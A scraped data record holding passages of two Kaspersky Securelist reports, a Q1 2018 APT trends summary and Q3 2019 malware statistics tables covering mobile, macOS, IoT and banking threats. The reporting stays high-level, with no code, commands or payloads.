reports in an effort to make the public aware of the research we have been conducting. This report serves as the next installment, focusing on the relevant activities that we observed during Q1 2018.\n\nThese summaries serve as a representative snapshot of what has been discussed in greater detail in our private reports, in order to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information on a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always very interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. In Q1 2018 we observed a bit of both, which are briefly summarized in this section.\n\nWe would like to start by highlighting all the new exploitation techniques applicable for the Meltdown/Spectre vulnerabilities that affect different CPU architectures and vendors. Even though we haven't seen any of them exploited in the wild so far (only several PoCs) and although vendors have provided various patches to mitigate them, there is still no real solution. The problem relies on the optimization methods used at the processor's architecture level. Given that a massive hardware replacement is not a realistic solution, Meltdown and Spectre might very well open the door to new infection vectors and persistence methods that we will see in the future.\n\nA similar case was the announcement of several flaws for AMD processors. Even when the full technical details were not yet available, AMD confirmed that these flaws could be exploited for privilege escalation and persistence once a target has been compromised.\n\nWe also observed an increasing interest from attackers, including sophisticated actors, in targeting routers and networking hardware. Some early examples of such attacks driven by advanced groups include Regin and CloudAtlas. Additionally, the US Government published an advisory on unusual reboots in a prominent router brand, which might indicate that these specific devices are being actively targeted.\n\nIn our Slingshot analysis, we described how the campaign was using Mikrotik routers as an infection vector, compromising the routers to later infect the final victim through the very peculiar mechanism that Mikrotik used for the remote management of devices. In actual fact, we recognised the interest of some actors in this particular brand when the Chimay-red exploit for Mikrotek was mentioned in Wikileak\u00b4s Vault7. This same exploit was later reused by the Hajime botnet in 2018, showing once again how dangerous leaked exploits can be. Even when the vulnerability was fixed by Mikrotik, networking hardware is rarely managed properly from a security perspective. Additionally, Mikrotik reported a zero day vulnerability ([CVE-2018-7445](<https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow>)) in March 2018.\n\nWe believe routers are still an excellent target for attackers, as demonstrated by the examples above, and will continue to be abused in order to get a foothold in the victim\u00b4s infrastructure.\n\nOne of the most relevant attacks during this first quarter of 2018 was the Olympic Destroyer malware, affecting several companies related to the Pyeongchang Olympic Games' organization and some Olympic facilities. There are different aspects of this attack to highlight, including the fact that attackers compromised companies that were providing services to the games\u00b4 organization in order to gain access, continuing the dangerous supply chain trend.\n\nBesides the technical considerations, one of the more open questions is related to the general perception that attackers could have done much more harm than they actually did, which opened some speculation as to what the real purpose of the attack was.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130221/180411-2018-Q1-APT-activity-1.png>)\n\n**_MZ DOS and Rich headers of both files (3c0d740347b0362331c882c2dee96dbf \u2013 OlympicDestroyer, 5d0ffbc8389f27b0649696f0ef5b3cfe \u2013 Bluenoroff) are exactly the same._**\n\nIn addition, a very relevant aspect is the effort attackers put in to planting several elaborative false flags, making this attack one of the most difficult we have analyzed in terms of attribution.\n\nIn February, we published a report about a previously unknown advanced Android backdoor that we call Skygofree. It seems that the author could be an Italian company selling the product in a similar way to how Hacking Team did in the past, however we don't yet have any proof of this. Interestingly, shortly after we detected the Android samples of this malware, we also found an early iOS version of the backdoor. In this case, attackers had abused a rogue MDM (Mobile Device Management) server in order to install their malware in victims' devices, probably using social engineering techniques to trick them into connecting with the rogue MDM.\n\nFinally, we would like to highlight three new actors that we have found, all of them focused in the Asia region:\n\n * Shaggypanther \u2013 A Chinese-speaking cluster of activity targeting government entities, mainly in Taiwan and Malaysia, active since 2008 and using hidden encrypted payloads in registry keys. We couldn't relate this to any known actor.\n * Sidewinder \u2013 An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.\n * CardinalLizard - We are moderately confident that this is a new collection of Chinese-speaking activity targeting businesses, active since 2014. Over the last few years, the group has shown an interest in the Philippines, Russia, Mongolia and Malaysia, the latter especially prevalent during 2018. The hackers use a custom malware featuring some interesting anti-detection and anti-emulation techniques. The infrastructure used also shows some overlaps with RomaingTiger and previous PlugX campaigns, but this could just be due to infrastructure reuse under the Chinese-speaking umbrella.\n\n## **Activity of well-known groups**\n\nSome of the most heavily tracked groups, especially those that are Russian-speaking, didn\u00b4t show any remarkable activity during the last three months, as far as we know.\n\nWe observed limited activity from Sofacy in distributing Gamefish, updating its Zebrocy toolset and potentially registering new domains that might be used for future campaigns. We also saw the group slowly shift its targeting to Asia during the last months.\n\nIn the case of Turla (Snake, Uroburos), the group was suspected of breaching the German Governmental networks, according to some reports. The breach was originally reported as Sofacy, but since then no additional technical details or official confirmation have been provided.\n\nThe apparent low activity of these groups - and some others such as The Dukes - could be related to some kind of internal reorganization, however this is purely speculative.\n\n## **Asia - high activity**\n\nThe ever-growing APT activity in this part of the World shouldn\u00b4t be a surprise, especially seeing as the Winter Olympic Games was hosted in South Korea in January 2018. More than 30% of our 27 reports during Q1 were focused on the region.\n\nProbably one of the most interesting activities relates to [Kimsuky](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/\">), an actor with a North-Korean nexus interested in South Korean think tanks and political activities. The actor renewed its arsenal with a completely new framework designed for cyberespionage, which was used in a spear-phishing campaign against South Korean targets, similar to the one targeting [KHNP](<http://h21.hani.co.kr/arti/economy/economy_general/38919.html>) in 2014. According to McAfee, this activity was related to attacks against companies involved in the organization of the Pyeongchang Olympic Games, however we cannot confirm this.\n\nThe Korean focus continues with our analysis of the Flash Player 0-day vulnerability (CVE-2018-4878), deployed by Scarcruft at the end of January and triggered by Microsoft Word documents distributed through at least one website. This vulnerability was quickly reported by the Korean CERT (KN-CERT), which we believe helped to quickly mitigate any aggressive spreading. At the time of our analysis, we could only detect one victim in South Africa.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130229/180411-2018-Q1-APT-activity-2.png>)\n\n_Forgotten PDB path inside the malware used by Scarcruft with CVE-2018-4876_\n\nFurthermore, IronHusky is a Chinese-speaking actor that we first detected in summer 2017. It is very focused on tracking the geopolitical agenda of targets in central Asia with a special focus in Mongolia, which seems to be an unusual target. This actor crafts campaigns for upcoming events of interest. In this case, they prepared and launched one right before a meeting with the International Monetary Fund and the Mongolian government at the end of January 2018. At the same time, they stopped their previous operations targeting Russian military contractors, which speaks volumes about the group's limitations. In this new campaign, they exploited CVE-2017-11882 to spread common RATs typically used by Chinese-speaking groups, such as PlugX and PoisonIvy.\n\nThe final remark for this section covers the apparently never-ending greed of BlueNoroff, which has been moving to new targets among cryptocurrencies companies and expanding its operations to target PoS's. However, we haven\u00b4t observed any new remarkable changes in the modus operandi of the group.\n\n## **Middle East - always under pressure**\n\nThere was a remarkable peak in StrongPity's activity at the beginning of the year, both in January and March. For this new wave of attacks, the group used a new version of its malware that we simply call StrongPity2. However, the most remarkable aspect is the use of MiTM techniques at the ISP level to spread the malware, redirecting legitimate downloads to their artifacts. The group combines this method with registering domains that are similar to the ones used for downloading legitimate software.\n\nStrongPity also distributed FinFisher using the same MiTM method at the ISP level, more details of which were provided by CitizenLab.\n\nDesert Falcons showed a peak of activity at the end of 2017 and the beginning of 2018. Their toolset for this new campaign included Android implants that they had previously used back in 2014. The group continues to heavily rely on social engineering methods for malware distribution, and use rudimentary artifacts for infecting their victims. In this new wave we observed high-profile victims based mostly in Palestine, Egypt, Jordan, Israel, Lebanon and Turkey.\n\nA particularly interesting case we analyzed was the evolution of what we believe to be the Gaza Team actor. What makes us question whether this is the same actor that we have tracked in the past, is the fact that we observed a remarkable boost in the artifacts used by the group. We actually can\u00b4t be sure whether the group suddenly developed these new technical capabilities, or if they had some internal reorganization or acquired improved tools. Another possibility is that the group itself was somehow hacked and a third actor is now distributing their artifacts through them.\n\n## **Final Thoughts**\n\nAs a summary of what happened during the last 3 months, we have the impression that some well-known actors are rethinking their strategies and reorganizing their teams for future attacks. In addition, a whole new wave of attackers are becoming much more active. For all these new attackers we observe different levels of sophistication, but let\u00b4s admit that the entry barrier for cyberespionage is much lower than it used to be in terms of the availability of different tools that can be used for malicious activities. Powershell, for instance, is one of the most common resources used by any of them. In other cases, there seems to be a flourishing industry of malware development behind the authorship of the tools that have been used in several campaigns.\n\nSome of the big stories like Olympic Destroyer teach us what kind of difficulties we will likely find in the future in terms of attribution, while also illustrating how effective supply chain attacks still are. Speaking of new infection vectors, some of the CPU vulnerabilities discovered in the last few months will open new possibilities for attackers; unfortunately there is not an easy, universal protection mechanism for all of them. Routing hardware is already an infection vector for some actors, which should make us think whether we are following all the best practices in protecting such devices.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more please reach out to us at intelreports@kasperksy.com.", "cvss3": {}, "published": "2018-04-12T10:00:17", "type": "securelist", "title": "APT Trends report Q1 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-4876", "CVE-2018-4878", "CVE-2018-7445"], "modified": "2018-04-12T10:00:17", "href": "https://securelist.com/apt-trends-report-q1-2018/85280/", "id": "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-29T14:41:16", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.\n * 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were blocked on the computers of 197,559 users.\n * Ransomware attacks were defeated on the computers of 229,643 unique users.\n * Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 870,617 malicious installation packages\n * 13,129 installation packages for mobile banking Trojans\n * 13,179 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nIn Q3 2019, we discovered an extremely [unpleasant incident](<https://securelist.com/dropper-in-google-play/92496/>) with the popular CamScanner app on Google Play. The new version of the app contained an ad library inside with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper's task was to activate paid subscriptions, although it could deliver another payload if required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171243/malware-q3-2019-statistics-en-1.png>)\n\nAnother interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to \"like\" Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.\n\nIn the same quarter, we discovered [new FinSpy spyware Trojans](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps. The iOS version requires a [jailbreak](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) to do its job, while the Android version is able to spy on the encrypted Threema app among others.\n\n### Mobile threat statistics\n\nIn Q3 2019, Kaspersky detected 870,617 malicious installation packages.\n\n_Number of detected malicious installation packages, Q4 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171249/malware-q3-2019-statistics-en-2.png>)\n\nWhereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3's figure was up by 117,067 packages compared to the previous quarter.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of detected mobile apps by type, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/29125517/malware-q3-2019-statistics-en-3.png>)\n\nAmong all the mobile threats detected in Q3 2019, the lion's share went to potentially unsolicited RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).\n\nSecond place went to miscellaneous Trojans united under the Trojan class (21.68%), their share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1% ) families remaining in the lead. Kaspersky's machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% \u2014 second place after Hiddapp.\n\nIn third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).\n\nThreats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).\n\n### TOP 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 48.71 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.03 \n3 | Trojan.AndroidOS.Hiddapp.ch | 7.24 \n4 | Trojan.AndroidOS.Hiddapp.cr | 7.23 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 6.87 \n6 | DangerousObject.AndroidOS.GenericML | 4.34 \n7 | Trojan-Downloader.AndroidOS.Helper.a | 1.99 \n8 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.75 \n9 | Trojan-Dropper.AndroidOS.Agent.ok | 1.65 \n10 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.52 \n11 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.46 \n12 | Trojan-Downloader.AndroidOS.Necro.b | 1.45 \n13 | Trojan-Dropper.AndroidOS.Lezok.p | 1.44 \n14 | Trojan.AndroidOS.Hiddapp.cf | 1.41 \n15 | Trojan.AndroidOS.Dvmap.a | 1.27 \n16 | Trojan.AndroidOS.Agent.rt | 1.24 \n17 | Trojan-Banker.AndroidOS.Asacub.snt | 1.21 \n18 | Trojan-Dropper.AndroidOS.Necro.q | 1.19 \n19 | Trojan-Dropper.AndroidOS.Necro.l | 1.12 \n20 | Trojan-SMS.AndroidOS.Prizmes.a | 1.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nFirst place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and six places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.\n\nFifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.\n\nSeventh place goes to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.\n\nThe eighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.\n\nNinth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client. Most commonly, it drops adware modules into the infected system.\n\nTenth and eleventh places went to members of the Trojan-Banker.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals [continues to fall](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>).\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171307/malware-q3-2019-statistics-en-4.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware**\n\n| Country* | %** \n---|---|--- \n1 | Iran | 52.68 \n2 | Bangladesh | 30.94 \n3 | India | 28.75 \n4 | Pakistan | 28.13 \n5 | Algeria | 26.47 \n6 | Indonesia | 23.38 \n7 | Nigeria | 22.46 \n8 | Tanzania | 21.96 \n9 | Saudi Arabia | 20.05 \n10 | Egypt | 19.44 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3's TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country's share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), adware installing Trojan.AndroidOS.Hiddapp.bn (14.68% ) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).\n\nBangladesh (30.94%) retained second place in the ranking. Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.f\u0441 (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.\n\nIndia (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.f\u0441 (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,129** installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.\n\nThe largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS. Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171313/malware-q3-2019-statistics-en-5.png>)\n\n**TOP 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Svpeng.ak | 16.85 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 11.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.97 \n4 | Trojan-Banker.AndroidOS.Asacub.ce | 8.07 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 5.51 \n6 | Trojan-Banker.AndroidOS.Asacub.a | 5.27 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 5.26 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 3.62 \n9 | Trojan-Banker.AndroidOS.Faketoken.snt | 2.91 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.81 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats._\n\nThe TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals \u2014 this time the code of the malware Svpeng.ak featured the names of video games.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171317/malware-q3-2019-statistics-en-6.png>)\n\n_Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak_\n\nSecond, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.\n\n_Geography of mobile banking threats, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171323/malware-q3-2019-statistics-en-7.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 0.30 \n2 | South Africa | 0.20 \n3 | Kuwait | 0.18 \n4 | Tajikistan | 0.13 \n5 | Spain | 0.12 \n6 | Indonesia | 0.12 \n7 | China | 0.11 \n8 | Singapore | 0.11 \n9 | Armenia | 0.10 \n10 | Uzbekistan | 0.10 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide. It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).\n\nSouth Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.\n\nBronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.\n\n### Mobile ransomware Trojans\n\nIn Q3 2019, we detected 13,179 installation packages for mobile ransomware \u2014 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171329/malware-q3-2019-statistics-en-8.png>)\n\n**TOP 10 mobile ransomware Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 40.97 \n2 | Trojan-Ransom.AndroidOS.Small.as | 8.82 \n3 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.79 \n4 | Trojan-Ransom.AndroidOS.Rkor.i | 5.20 \n5 | Trojan-Ransom.AndroidOS.Rkor.h | 4.78 \n6 | Trojan-Ransom.AndroidOS.Small.o | 3.60 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ai | 2.93 \n8 | Trojan-Ransom.AndroidOS.Small.ce | 2.93 \n9 | Trojan-Ransom.AndroidOS.Fusob.h | 2.72 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 2.66 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family. Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.\n\n_Geography of mobile ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171337/malware-q3-2019-statistics-en-9.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | US | 1.12 \n2 | Iran | 0.25 \n3 | Kazakhstan | 0.25 \n4 | Oman | 0.09 \n5 | Qatar | 0.08 \n6 | Saudi Arabia | 0.06 \n7 | Mexico | 0.05 \n8 | Pakistan | 0.05 \n9 | Kuwait | 0.04 \n10 | Indonesia | 0.04 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nQ3 saw a lull in the emergence of new threats. An exception was the distribution of a [modified version](<https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/>) of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.\n\n### TOP 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 22.71 \n2 | AdWare.OSX.Pirrit.j | 14.43 \n3 | AdWare.OSX.Pirrit.s | 11.73 \n4 | AdWare.OSX.Pirrit.p | 10.43 \n5 | AdWare.OSX.Pirrit.o | 9.71 \n6 | AdWare.OSX.Bnodlero.t | 8.40 \n7 | AdWare.OSX.Spc.a | 7.32 \n8 | AdWare.OSX.Cimpli.d | 6.92 \n9 | AdWare.OSX.MacSearch.a | 4.88 \n10 | Adware.OSX.Agent.d | 4.71 \n11 | AdWare.OSX.Ketin.c | 4.63 \n12 | AdWare.OSX.Ketin.b | 4.10 \n13 | Downloader.OSX.InstallCore.ab | 4.01 \n14 | AdWare.OSX.Cimpli.e | 3.86 \n15 | AdWare.OSX.Bnodlero.q | 3.78 \n16 | AdWare.OSX.Cimpli.f | 3.76 \n17 | AdWare.OSX.Bnodlero.x | 3.49 \n18 | AdWare.OSX.Mcp.a | 3.26 \n19 | AdWare.OSX.MacSearch.d | 3.18 \n20 | AdWare.OSX.Amc.a | 3.15 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nLike last quarter, the adware Trojan Shlayer was the top threat for macOS. This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 6.95 \n2 | India | 6.24 \n3 | Spain | 5.61 \n4 | Italy | 5.29 \n5 | US | 4.84 \n6 | Russia | 4.79 \n7 | Brazil | 4.75 \n8 | Mexico | 4.68 \n9 | Canada | 4.46 \n10 | Australia | 4.27 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3, the trend continued toward a decrease in the number of IP addresses of devices used to carry out attacks on Kaspersky Telnet honeypots. If in Q2 Telnet's share was still significantly higher than that of SSH, in Q3 the figures were almost equal. \n \nSSH | 48.17% \nTelnet | 51.83% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019_\n\nAs for the number of sessions involving Kaspersky [traps](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we noted that in Q3 Telnet-based control was also deployed more often. \n \nSSH | 40.81% \nTelnet | 59.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171344/malware-q3-2019-statistics-en-10.png>)\n\n**TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps**\n\n| Country | %* \n---|---|--- \n1 | China | 13.78 \n2 | Egypt | 10.89 \n3 | Brazil | 8.56 \n4 | Taiwan | 8.33 \n5 | US | 4.71 \n6 | Russia | 4.35 \n7 | Turkey | 3.47 \n8 | Vietnam | 3.44 \n9 | Greece | 3.43 \n10 | India | 3.41 \n \nLast quarter's leaders Egypt (10.89%), China (13.78%), and Brazil (8.56%) again made up the TOP 3, the only difference being that this time China took the first place.\n\nTelnet-based attacks most often resulted in the download of a member of the notorious Mirai family.\n\n**TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.08 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.46 \n3 | Backdoor.Linux.Mirai.ba | 16.52 \n4 | Backdoor.Linux.Gafgyt.bj | 2.76 \n5 | Backdoor.Linux.Mirai.au | 2.21 \n6 | Backdoor.Linux.Mirai.c | 2.02 \n7 | Backdoor.Linux.Mirai.h | 1.81 \n8 | Backdoor.Linux.Mirai.ad | 1.66 \n9 | Backdoor.Linux.Gafgyt.az | 0.86 \n10 | Backdoor.Linux.Mirai.a | 0.80 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171352/malware-q3-2019-statistics-en-11.png>)\n\n**TOP 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n| Country | %* \n---|---|--- \n1 | Egypt | 17.06 \n2 | Vietnam | 16.98 \n3 | China | 13.81 \n4 | Brazil | 7.37 \n5 | Russia | 6.71 \n6 | Thailand | 4.53 \n7 | US | 4.13 \n8 | Azerbaijan | 3.99 \n9 | India | 2.55 \n10 | France | 1.53 \n \nIn Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.\n\n_Number of unique users attacked by financial malware, Q3 2019_[ 